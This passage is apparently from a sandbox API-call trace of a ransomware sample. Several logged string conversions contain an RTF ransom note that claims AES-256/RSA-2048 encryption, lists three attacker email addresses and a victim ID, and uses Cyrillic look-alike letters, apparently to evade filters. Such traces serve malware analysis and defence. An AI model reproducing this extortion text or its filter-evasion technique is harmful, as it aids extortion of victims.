fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.366] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.366] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2867358, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL 